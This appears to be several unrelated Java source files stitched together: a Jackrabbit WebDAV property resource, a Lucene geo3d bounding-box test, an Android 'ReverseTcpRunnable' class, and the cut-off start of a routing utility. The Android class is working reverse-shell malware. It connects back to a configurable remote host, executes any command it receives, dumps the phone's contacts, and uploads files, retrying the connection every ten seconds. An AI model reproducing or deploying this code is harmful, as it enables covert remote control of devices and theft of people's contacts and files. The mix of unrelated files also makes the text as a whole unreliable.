import org.xml.sax.SAXException;
import javax.jcr.Binary;
import javax.jcr.Item;
import javax.jcr.Property;
import javax.jcr.PropertyType;
import javax.jcr.RepositoryException;
import javax.jcr.Value;
import javax.jcr.ValueFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.sax.SAXResult;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Collections;
import java.util.Date;
import java.util.List;
/**
* <code>DefaultItemResource</code> represents a JCR property item.
*
* @see Property
*/
public class DefaultItemResource extends AbstractItemResource {
private static Logger log = LoggerFactory.getLogger(DefaultItemResource.class);
/**
* Create a new <code>DefaultItemResource</code>.
*
* @param locator
* @param session
* @param factory
* @param item
*/
public DefaultItemResource(DavResourceLocator locator, JcrDavSession session,
DavResourceFactory factory, Item item) {
super(locator, session, factory, item);
}
//----------------------------------------------< DavResource interface >---
/**
* Returns false.
*
* @return false
* @see DavResource#isCollection()
*/
@Override
public boolean isCollection() {
return false;
}
/**
* Always returns 'now'
*
* @return
* @see DavResource#getModificationTime()
*/
@Override
public long getModificationTime() {
return new Date().getTime();
}
/**
* In case an underlying repository {@link Property property} exists the following
* logic is applied to spool the property content:
* <ul>
* <li>Property is not multi valued: Return the {@link javax.jcr.Value#getStream()
* stream representation} of the property value.</li>
* <li>Property is multivalue: Return the xml representation of the values.</li>
* </ul>
*
* @param outputContext
* @see DavResource#spool(OutputContext)
*/
@Override
public void spool(OutputContext outputContext) throws IOException {
// write properties
super.spool(outputContext);
// spool content
OutputStream out = outputContext.getOutputStream();
if (out != null && exists()) {
if (isMultiple()) {
spoolMultiValued(out);
} else {
spoolSingleValued(out);
}
}
}
private void spoolMultiValued(OutputStream out) {
try {
Document doc = DomUtil.createDocument();
doc.appendChild(getProperty(JCR_VALUES).toXml(doc));
ContentHandler handler =
SerializingContentHandler.getSerializer(out);
Transformer transformer =
TransformerFactory.newInstance().newTransformer();
transformer.transform(
new DOMSource(doc), new SAXResult(handler));
} catch (SAXException e) {
log.error("Failed to set up XML serializer for " + item, e);
} catch (TransformerConfigurationException e) {
log.error("Failed to set up XML transformer for " + item, e);
} catch (ParserConfigurationException e) {
log.error("Failed to set up XML document for " + item, e);
} catch (TransformerException e) {
log.error("Failed to serialize the values of " + item, e);
}
}
private void spoolSingleValued(OutputStream out) throws IOException {
try {
Binary binary = ((Property) item).getBinary();
try {
InputStream in = binary.getStream();
try {
IOUtil.spool(in, out);
} finally {
in.close();
}
} finally {
binary.dispose();
}
} catch (RepositoryException e) {
log.error("Cannot obtain stream from " + item, e);
}
}
@Override
public DavProperty<?> getProperty(DavPropertyName name) {
DavProperty<?> prop = super.getProperty(name);
if (prop == null && exists()) {
try {
Property p = (Property) item;
if (isMultiple()) {
if (JCR_LENGTHS.equals(name)) {
prop = new LengthsProperty(p.getLengths());
}
} else {
if (JCR_LENGTH.equals(name)) {
long length = p.getLength();
prop = new DefaultDavProperty<String>(JCR_LENGTH, String.valueOf(length), true);
} else if (JCR_GET_STRING.equals(name) && p.getType() != PropertyType.BINARY) {
// getstring property is only created for single value
// non-binary jcr properties
prop = new DefaultDavProperty<String>(JCR_GET_STRING, p.getString(), true);
}
}
} catch (RepositoryException e) {
log.error("Failed to retrieve resource properties: "+e.getMessage());
}
}
return prop;
}
/**
* Sets the given property. Note, that {@link #JCR_VALUE} and {@link #JCR_VALUES}
* are the only resource properties that are allowed to be modified. Any other
* property is read-only and will throw an exception ('Conflict').
*
* @param property
* @throws DavException
* @see DavResource#setProperty(org.apache.jackrabbit.webdav.property.DavProperty)
*/
@Override
public void setProperty(DavProperty<?> property) throws DavException {
internalSetProperty(property);
complete();
}
/**
* Internal method that performs the setting or adding of properties
*
* @param property
* @throws DavException
* @see #setProperty(DavProperty)
* @see #alterProperties(List)
*/
private void internalSetProperty(DavProperty<?> property) throws DavException {
if (!exists()) {
throw new DavException(DavServletResponse.SC_NOT_FOUND);
}
try {
Property prop = (Property) item;
int defaultType = prop.getType();
ValueFactory vfact = getRepositorySession().getValueFactory();
ValuesProperty vp = new ValuesProperty(property, defaultType, vfact);
if (property.getName().equals(JCR_VALUE)) {
prop.setValue(vp.getJcrValue(vp.getValueType(), vfact));
} else if (property.getName().equals(JCR_VALUES)) {
prop.setValue(vp.getJcrValues());
} else {
throw new DavException(DavServletResponse.SC_CONFLICT);
}
} catch (RepositoryException e) {
throw new JcrDavException(e);
}
}
/**
* Removing properties is not allowed: a single-value JCR property without
* a value does not exist. For multi-valued properties an empty {@link Value values array}
* may be specified by setting the {@link #JCR_VALUES 'values' webdav property}.
*
* @param propertyName
* @throws DavException
* @see org.apache.jackrabbit.webdav.DavResource#removeProperty(org.apache.jackrabbit.webdav.property.DavPropertyName)
*/
@Override
public void removeProperty(DavPropertyName propertyName) throws DavException {
if (!exists()) {
throw new DavException(DavServletResponse.SC_NOT_FOUND);
}
throw new DavException(DavServletResponse.SC_FORBIDDEN);
}
/**
* Loops over the given <code>List</code> and alters the properties accordingly.
* Changes are persisted at the end only according to the rules defined with
* the {@link #complete()} method.<p>
* Please note: since there is only a single property that can be set
* from a client (i.e. jcr:value OR jcr:values) this method either succeeds
* or throws an exception, even if this violates RFC 2518.
*
* @param changeList
* @throws DavException
* @see DavResource#alterProperties(List)
*/
@Override
public MultiStatusResponse alterProperties(List<? extends PropEntry> changeList) throws DavException {
for (PropEntry propEntry : changeList) {
if (propEntry instanceof DavPropertyName) {
// altering any properties fails if an attempt is made to remove
// a property
throw new DavException(DavServletResponse.SC_FORBIDDEN);
} else if (propEntry instanceof DavProperty<?>) {
DavProperty<?> prop = (DavProperty<?>) propEntry;
internalSetProperty(prop);
} else {
throw new IllegalArgumentException("unknown object in change list: " + propEntry.getClass().getName());
}
}
complete();
return new MultiStatusResponse(getHref(), DavServletResponse.SC_OK);
}
/**
* Method is not allowed.
*
* @see org.apache.jackrabbit.webdav.DavResource#addMember(org.apache.jackrabbit.webdav.DavResource, InputContext)
*/
@Override
public void addMember(DavResource resource, InputContext inputContext) throws DavException {
throw new DavException(DavServletResponse.SC_METHOD_NOT_ALLOWED, "Cannot add members to a non-collection resource");
}
/**
* Always returns an empty iterator, since a non-collection resource cannot
* have internal members.
*
* @return an empty iterator
* @see DavResource#getMembers()
*/
@Override
public DavResourceIterator getMembers() {
log.warn("A non-collection resource never has internal members.");
List<DavResource> drl = Collections.emptyList();
return new DavResourceIteratorImpl(drl);
}
/**
* Method is not allowed.
*
* @see DavResource#removeMember(DavResource)
*/
@Override
public void removeMember(DavResource member) throws DavException {
throw new DavException(DavServletResponse.SC_METHOD_NOT_ALLOWED, "Cannot remove members from a non-collection resource");
}
/**
* {@link javax.jcr.Property JCR properties} are locked if their
* parent node is locked; thus this method will always return the
* {@link ActiveLock lock} object from the collection this resource is
* an internal member of.
*
* @param type
* @param scope
* @return lock present on this resource or <code>null</code> if this resource
* has no lock.
* @see DavResource#getLock(Type, Scope)
*/
@Override
public ActiveLock getLock(Type type, Scope scope) {
if (Type.WRITE.equals(type)) {
return getCollection().getLock(type, scope);
} else {
return super.getLock(type, scope);
}
}
//--------------------------------------------------------------------------
@Override
protected void initPropertyNames() {
super.initPropertyNames();
if (exists()) {
DavPropertyNameSet propNames = (isMultiple() ?
JcrDavPropertyNameSet.PROPERTY_MV_SET :
JcrDavPropertyNameSet.PROPERTY_SET);
names.addAll(propNames);
}
}
/**
* Add resource specific properties.
*/
@Override
protected void initProperties() {
super.initProperties();
if (exists()) {
try {
Property prop = (Property)item;
int type = prop.getType();
// set the content type
String contentType;
if (isMultiple()) {
contentType = IOUtil.buildContentType("text/xml","utf-8");
} else {
contentType = IOUtil.buildContentType(JcrValueType.contentTypeFromType(type), "utf-8");
}
properties.add(new DefaultDavProperty<String>(DavPropertyName.GETCONTENTTYPE, contentType));
// add jcr-specific resource properties
properties.add(new DefaultDavProperty<String>(JCR_TYPE, PropertyType.nameFromValue(type)));
if (isMultiple()) {
properties.add(new ValuesProperty(prop.getValues()));
} else {
properties.add(new ValuesProperty(prop.getValue()));
}
} catch (RepositoryException e) {
log.error("Failed to retrieve resource properties: "+e.getMessage());
}
}
}
/**
* Returns true if the JCR Property represented by this resource is a multi
* value property. Note: if this resource does not exist or if the definition
* could not be retrieved false is returned.
*
* @return true if the underlying resource is a multi value property.
*/
private boolean isMultiple() {
try {
if (exists() && ((Property)item).isMultiple()) {
return true;
}
} catch (RepositoryException e) {
log.error("Error while retrieving property definition: " + e.getMessage());
}
return false;
}
}
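// A small sketch of the single-value spooling pattern used by spoolSingleValued() above,
// assuming an already obtained javax.jcr.Property; the helper class name and buffer size are
// arbitrary. It shows the essential contract: obtain the Binary, stream it, and always
// dispose() it so repository-side resources are released.
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import javax.jcr.Binary;
import javax.jcr.Property;
import javax.jcr.RepositoryException;
final class BinarySpoolSketch {
    static void spool(Property property, OutputStream out) throws RepositoryException, IOException {
        Binary binary = property.getBinary();
        try {
            InputStream in = binary.getStream();
            try {
                byte[] buffer = new byte[8192];
                int read;
                while ((read = in.read(buffer)) != -1) {
                    out.write(buffer, 0, read);
                }
            } finally {
                in.close();
            }
        } finally {
            binary.dispose();
        }
    }
}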
|
|
package org.apache.lucene.geo3d;
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import java.util.ArrayList;
import java.util.List;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
public class GeoBBoxTest {
protected final double DEGREES_TO_RADIANS = Math.PI / 180.0;
@Test
public void testBBoxDegenerate() {
GeoBBox box;
GeoConvexPolygon cp;
int relationship;
List<GeoPoint> points = new ArrayList<GeoPoint>();
points.add(new GeoPoint(PlanetModel.SPHERE, 24 * DEGREES_TO_RADIANS, -30 * DEGREES_TO_RADIANS));
points.add(new GeoPoint(PlanetModel.SPHERE, -11 * DEGREES_TO_RADIANS, 101 * DEGREES_TO_RADIANS));
points.add(new GeoPoint(PlanetModel.SPHERE, -49 * DEGREES_TO_RADIANS, -176 * DEGREES_TO_RADIANS));
GeoMembershipShape shape = GeoPolygonFactory.makeGeoPolygon(PlanetModel.SPHERE, points, 0);
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, -64 * DEGREES_TO_RADIANS, -64 * DEGREES_TO_RADIANS, -180 * DEGREES_TO_RADIANS, 180 * DEGREES_TO_RADIANS);
relationship = box.getRelationship(shape);
assertEquals(GeoArea.CONTAINS, relationship);
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, -61.85 * DEGREES_TO_RADIANS, -67.5 * DEGREES_TO_RADIANS, -180 * DEGREES_TO_RADIANS, -168.75 * DEGREES_TO_RADIANS);
System.out.println("Shape = " + shape + " Rect = " + box);
relationship = box.getRelationship(shape);
assertEquals(GeoArea.CONTAINS, relationship);
}
@Test
public void testBBoxPointWithin() {
GeoBBox box;
GeoPoint gp;
// Standard normal Rect box, not crossing dateline
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, -1.0, 1.0);
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, 0.0);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, 0.1, 0.0);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.5, 0.0);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, 1.1);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -1.1);
assertFalse(box.isWithin(gp));
assertEquals(0.1,box.computeOutsideDistance(DistanceStyle.ARC,gp),1e-2);
assertEquals(0.1,box.computeOutsideDistance(DistanceStyle.NORMAL,gp),1e-2);
assertEquals(0.1,box.computeOutsideDistance(DistanceStyle.NORMAL,gp),1e-2);
// Standard normal Rect box, crossing dateline
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, Math.PI - 1.0, -Math.PI + 1.0);
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, 0.1, -Math.PI);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.5, -Math.PI);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI + 1.1);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, (-Math.PI - 1.1) + Math.PI * 2.0);
assertFalse(box.isWithin(gp));
// Latitude zone rectangle
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, -Math.PI, Math.PI);
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, 0.1, -Math.PI);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.5, -Math.PI);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI + 1.1);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, (-Math.PI - 1.1) + Math.PI * 2.0);
assertTrue(box.isWithin(gp));
// World
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -Math.PI, Math.PI);
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, 0.1, -Math.PI);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.5, -Math.PI);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -Math.PI + 1.1);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, (-Math.PI - 1.1) + Math.PI * 2.0);
assertTrue(box.isWithin(gp));
}
@Test
public void testBBoxExpand() {
GeoBBox box;
GeoPoint gp;
// Standard normal Rect box, not crossing dateline
box = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, -1.0, 1.0);
box = box.expand(0.1);
gp = new GeoPoint(PlanetModel.SPHERE, 0.05, 0.0);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, 0.15, 0.0);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.25 - 0.05, 0.0);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -Math.PI * 0.25 - 0.15, 0.0);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -1.05);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, -1.15);
assertFalse(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, 1.05);
assertTrue(box.isWithin(gp));
gp = new GeoPoint(PlanetModel.SPHERE, -0.1, 1.15);
assertFalse(box.isWithin(gp));
}
@Test
public void testBBoxBounds() {
GeoBBox c;
Bounds b;
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, -1.0, 1.0);
b = c.getBounds(null);
assertFalse(b.checkNoLongitudeBound());
assertFalse(b.checkNoTopLatitudeBound());
assertFalse(b.checkNoBottomLatitudeBound());
assertEquals(-1.0, b.getLeftLongitude(), 0.000001);
assertEquals(1.0, b.getRightLongitude(), 0.000001);
assertEquals(-Math.PI * 0.25, b.getMinLatitude(), 0.000001);
assertEquals(0.0, b.getMaxLatitude(), 0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, 1.0, -1.0);
b = c.getBounds(null);
assertTrue(b.checkNoLongitudeBound());
assertFalse(b.checkNoTopLatitudeBound());
assertFalse(b.checkNoBottomLatitudeBound());
//assertEquals(1.0,b.getLeftLongitude(),0.000001);
//assertEquals(-1.0,b.getRightLongitude(),0.000001);
assertEquals(-Math.PI * 0.25, b.getMinLatitude(), 0.000001);
assertEquals(0.0, b.getMaxLatitude(), 0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -1.0, 1.0);
b = c.getBounds(null);
assertFalse(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
assertEquals(-1.0, b.getLeftLongitude(), 0.000001);
assertEquals(1.0, b.getRightLongitude(), 0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, 1.0, -1.0);
b = c.getBounds(null);
assertTrue(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
//assertEquals(1.0,b.getLeftLongitude(),0.000001);
//assertEquals(-1.0,b.getRightLongitude(),0.000001);
// Check wide variants of rectangle and longitude slice
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, -Math.PI + 0.1, Math.PI - 0.1);
b = c.getBounds(null);
assertTrue(b.checkNoLongitudeBound());
assertFalse(b.checkNoTopLatitudeBound());
assertFalse(b.checkNoBottomLatitudeBound());
//assertEquals(-Math.PI+0.1,b.getLeftLongitude(),0.000001);
//assertEquals(Math.PI-0.1,b.getRightLongitude(),0.000001);
assertEquals(-Math.PI * 0.25, b.getMinLatitude(), 0.000001);
assertEquals(0.0, b.getMaxLatitude(), 0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 0.0, -Math.PI * 0.25, Math.PI - 0.1, -Math.PI + 0.1);
b = c.getBounds(null);
assertFalse(b.checkNoLongitudeBound());
assertFalse(b.checkNoTopLatitudeBound());
assertFalse(b.checkNoBottomLatitudeBound());
assertEquals(Math.PI - 0.1, b.getLeftLongitude(), 0.000001);
assertEquals(-Math.PI + 0.1, b.getRightLongitude(), 0.000001);
assertEquals(-Math.PI * 0.25, b.getMinLatitude(), 0.000001);
assertEquals(0.0, b.getMaxLatitude(), 0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -Math.PI + 0.1, Math.PI - 0.1);
b = c.getBounds(null);
assertTrue(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
//assertEquals(-Math.PI+0.1,b.getLeftLongitude(),0.000001);
//assertEquals(Math.PI-0.1,b.getRightLongitude(),0.000001);
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, Math.PI - 0.1, -Math.PI + 0.1);
b = c.getBounds(null);
assertFalse(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
assertEquals(Math.PI - 0.1, b.getLeftLongitude(), 0.000001);
assertEquals(-Math.PI + 0.1, b.getRightLongitude(), 0.000001);
// Check latitude zone
c = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, 1.0, -1.0, -Math.PI, Math.PI);
b = c.getBounds(null);
assertTrue(b.checkNoLongitudeBound());
assertFalse(b.checkNoTopLatitudeBound());
assertFalse(b.checkNoBottomLatitudeBound());
assertEquals(-1.0, b.getMinLatitude(), 0.000001);
assertEquals(1.0, b.getMaxLatitude(), 0.000001);
// Now, combine a few things to test the bounds object
GeoBBox c1;
GeoBBox c2;
c1 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -Math.PI, 0.0);
c2 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, 0.0, Math.PI);
b = new Bounds();
b = c1.getBounds(b);
b = c2.getBounds(b);
assertTrue(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
c1 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -Math.PI, 0.0);
c2 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, 0.0, Math.PI * 0.5);
b = new Bounds();
b = c1.getBounds(b);
b = c2.getBounds(b);
assertTrue(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
//assertEquals(-Math.PI,b.getLeftLongitude(),0.000001);
//assertEquals(Math.PI*0.5,b.getRightLongitude(),0.000001);
c1 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, -Math.PI * 0.5, 0.0);
c2 = GeoBBoxFactory.makeGeoBBox(PlanetModel.SPHERE, Math.PI * 0.5, -Math.PI * 0.5, 0.0, Math.PI);
b = new Bounds();
b = c1.getBounds(b);
b = c2.getBounds(b);
assertTrue(b.checkNoLongitudeBound());
assertTrue(b.checkNoTopLatitudeBound());
assertTrue(b.checkNoBottomLatitudeBound());
//assertEquals(-Math.PI * 0.5,b.getLeftLongitude(),0.000001);
//assertEquals(Math.PI,b.getRightLongitude(),0.000001);
}
}
|
|
package com.anythingintellect.androidreverseshell;
import android.content.Context;
import android.content.SharedPreferences;
import android.text.TextUtils;
import android.util.Log;
import com.anythingintellect.androidreverseshell.internalcmdutils.ContactHelper;
import com.anythingintellect.androidreverseshell.internalcmdutils.GetHelper;
import com.anythingintellect.androidreverseshell.utils.RSPreferences;
import org.json.JSONArray;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.Socket;
/**
* Created by ishan.dhingra on 21/07/16.
*/
public class ReverseTcpRunnable implements Runnable, SharedPreferences.OnSharedPreferenceChangeListener {
private static final long RETRY_WAIT_TIME = 10000;
String host;
int port;
private String directory = "/";
private static final String CMD_CD = "cd";
private static final String CMD_CONTACT = "contact";
private static final String CMD_GET = "get";
private Context mContext;
private RSPreferences rsPreferences;
public ReverseTcpRunnable(Context context) {
this.mContext = context;
this.rsPreferences = RSPreferences.getInstance(context);
this.host = rsPreferences.getHost();
this.port = rsPreferences.getPort();
rsPreferences.getSharedPreferences().registerOnSharedPreferenceChangeListener(this);
}
@Override
public void run() {
startReverseShell(host, port);
}
private void startReverseShell(String host, int port) {
DataOutputStream toServer = null;
BufferedReader fromServer = null;
log("Connecting to " + host + ":" + port);
boolean run = true;
try {
Socket socket = new Socket(host, port);
log("Connected!");
toServer = new DataOutputStream(socket.getOutputStream());
fromServer = new BufferedReader(
new InputStreamReader(socket.getInputStream()));
// Required to handshake with server
// Can be anything you like
toServer.write("Hello".getBytes("UTF-8"));
while (run) {
String command = fromServer.readLine();
if(TextUtils.isEmpty(command)) {
continue;
}
if (command.equalsIgnoreCase("bye")) {
run = false;
shotResponseLine("bye", toServer);
// Closing socket not required as we are closing stream in finally
continue;
}
doCommand(command.split(" "), toServer);
// Send the end-of-response marker so the remote server knows it can issue the next command
shotEndResponse(toServer);
}
} catch (IOException e) {
e.printStackTrace();
} finally {
try {
if (toServer != null) {
toServer.close();
}
if (fromServer != null) {
fromServer.close();
}
} catch (IOException e) {
e.printStackTrace();
}
if (run) {
retry();
} else {
doCleanup();
}
}
}
private void doCleanup() {
rsPreferences.getSharedPreferences().unregisterOnSharedPreferenceChangeListener(this);
}
private void shotEndResponse(DataOutputStream toServer) {
try {
toServer.flush();
toServer.write("$endRes$".getBytes("UTF-8"));
} catch (IOException e) {
e.printStackTrace();
}
}
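// Waits a fixed interval and then reconnects. Note that the recursive call from the finally
// block below deepens the call stack on every failed attempt; a plain retry loop would be the
// sturdier shape.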
private void retry() {
try {
Thread.sleep(RETRY_WAIT_TIME);
} catch (InterruptedException e1) {
e1.printStackTrace();
} finally {
startReverseShell(host, port);
}
}
// Entry point for all type of commands shell and custom
private void doCommand(String[] commands, DataOutputStream toServer) {
if(TextUtils.isEmpty(commands[0])) {
return;
}
// Check if custom command and process
if (tryInternalCommand(commands, toServer)) {
return;
}
// Try Shell commands
commands = decideCommandName(commands);
doShellCommand(commands, toServer);
}
private void shotResponseLine(String response, DataOutputStream toServer) {
try {
log(response);
toServer.write(response.getBytes("UTF-8"));
} catch (IOException e) {
e.printStackTrace();
}
}
private boolean doShellCommand(String[] commands, DataOutputStream toServer) {
// Executing command with specific directory
// directory init is handled by custom command
Process process;
BufferedReader reader = null;
try {
process = Runtime.getRuntime().exec(commands, null, new File(directory));
reader = new BufferedReader(
new InputStreamReader(process.getInputStream()));
String line = "";
while ((line = reader.readLine()) != null) {
shotResponseLine(line + "\n", toServer);
}
process.waitFor();
} catch (IOException e) {
e.printStackTrace();
} catch (InterruptedException e) {
e.printStackTrace();
} finally {
if (reader != null) {
try {
reader.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
return true;
}
private boolean tryInternalCommand(String[] cmd, DataOutputStream toServer) {
switch (cmd[0]) {
case CMD_CD: {
String dir = GetHelper.getDirNameFromCmd(cmd);
if(dir.startsWith("/")) {
directory = dir;
} else {
directory += "/" + dir;
}
String res = "Working directory changed to: "+directory;
shotResponseLine(res, toServer);
return true;
}
case CMD_CONTACT: {
JSONArray contacts = ContactHelper.fetchContact(mContext);
shotResponseLine(contacts.length()+ " Contacts Found!", toServer);
shotResponseArray(contacts, toServer);
return true;
}
case CMD_GET: {
// To be tested
if (cmd.length > 1) {
String filePath = directory + "/" + cmd[1];
File file = new File(filePath);
if (file.exists()) {
try {
Socket dataSock = new Socket(host, port);
InputStream fileStream = new FileInputStream(file);
OutputStream sockStream = dataSock.getOutputStream();
byte[] buffer = new byte[1024];
int count;
while ((count = fileStream.read(buffer))> 0) {
sockStream.write(buffer,0, count);
}
sockStream.close();
fileStream.close();
dataSock.close();
} catch (IOException e) {
e.printStackTrace();
}
}
} else {
shotResponseLine("Specify File Name!", toServer);
}
return true;
}
}
return false;
}
private void shotResponseArray(JSONArray array, DataOutputStream toServer) {
for (int i = 0; i < array.length(); i++) {
JSONObject item = (JSONObject) array.opt(i);
if (item != null) {
shotResponseLine(item.toString()+"\n", toServer);
}
}
}
private String[] decideCommandName(String[] commands) {
String cmd = commands[0];
// Point to bin, where most of the commands are
commands[0] = "/system/bin/" + commands[0];
// Check if the binary exists in /system/bin
File cmdFile = new File(commands[0]);
if (!cmdFile.exists()) {
// If not switch to plain command
commands[0] = cmd;
}
return commands;
}
private void log(String msg) {
if (msg != null) {
Log.d("rvtcp", msg);
}
}
@Override
public void onSharedPreferenceChanged(SharedPreferences sharedPreferences, String s) {
String newHost = rsPreferences.getHost();
int newPort = rsPreferences.getPort();
if (!newHost.equalsIgnoreCase(host)) {
this.host = newHost;
}
if (newPort != port) {
this.port = newPort;
}
}
}
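// A standalone sketch of the shell-execution pattern doShellCommand() uses above: run a
// command with an explicit working directory via Runtime.exec and stream its stdout line by
// line. The command and directory below are placeholders for a desktop JVM; the runnable
// above prefixes /system/bin/ instead and forwards each line to the socket.
import java.io.BufferedReader;
import java.io.File;
import java.io.IOException;
import java.io.InputStreamReader;
final class ShellExecSketch {
    public static void main(String[] args) throws IOException, InterruptedException {
        String[] command = {"ls", "-l"};           // placeholder command
        File workingDir = new File("/");           // placeholder working directory
        Process process = Runtime.getRuntime().exec(command, null, workingDir);
        BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
        try {
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
        } finally {
            reader.close();
        }
        process.waitFor();
    }
}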
|
|
package vrpsim.simulationmodel.dynamicbehaviour.impl.usutil;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class Util {
private static Logger logger = LoggerFactory.getLogger(Util.class);
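/**
 * Returns true if the linked {@link OpNode} structure is broken, i.e. a null next pointer is
 * reached or the cycle starting from an arbitrary node does not visit every node.
 */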
public static boolean isNull(Map<Integer, OpNode> structure) {
Set<OpNode> handled = new HashSet<>();
OpNode workWith = structure.get(structure.keySet().iterator().next());
int inserted = 0;
while (!handled.contains(workWith)) {
handled.add(workWith);
workWith = workWith.getNext();
if (workWith == null) {
return true;
}
inserted++;
}
return !(inserted == structure.size());
}
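/**
 * Maps a possibly negative index onto the ring [0, tourLength), treating the tour as cyclic.
 */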
public static int adaptIndex(int index, int tourLength) {
int result = index % tourLength;
result = result < 0 ? result + tourLength : result;
return result;
}
// private static String lineBreak = "\n";
